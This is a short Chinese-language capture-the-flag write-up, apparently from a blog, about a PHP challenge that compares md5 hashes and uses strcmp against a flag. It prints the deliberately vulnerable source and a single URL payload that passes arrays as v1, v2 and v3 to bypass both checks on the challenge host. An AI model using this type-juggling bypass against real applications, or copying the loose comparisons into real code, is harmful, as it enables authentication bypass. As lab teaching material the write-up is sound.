看题
到处找,都没有额外信息
抓包
发现“链接”那个地方隐藏了一个a标签,点击跳转,得到代码
分析代码
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;
}
}
}
?>
又跟md5有关,前面其实已经写过一篇了
https://blog.csdn.net/weixin_45254208/article/details/115425962
但是不仅要满足md5,还要使变量 $ v3等于变量 $ flag,strcmp无法识别数组,直接返回0,看来,三个变量全部可以构造数组绕过
构造payload
http://114.67.246.176:17268/?v1[]=1&v2[]=2&v3[]=3
OK,出flag了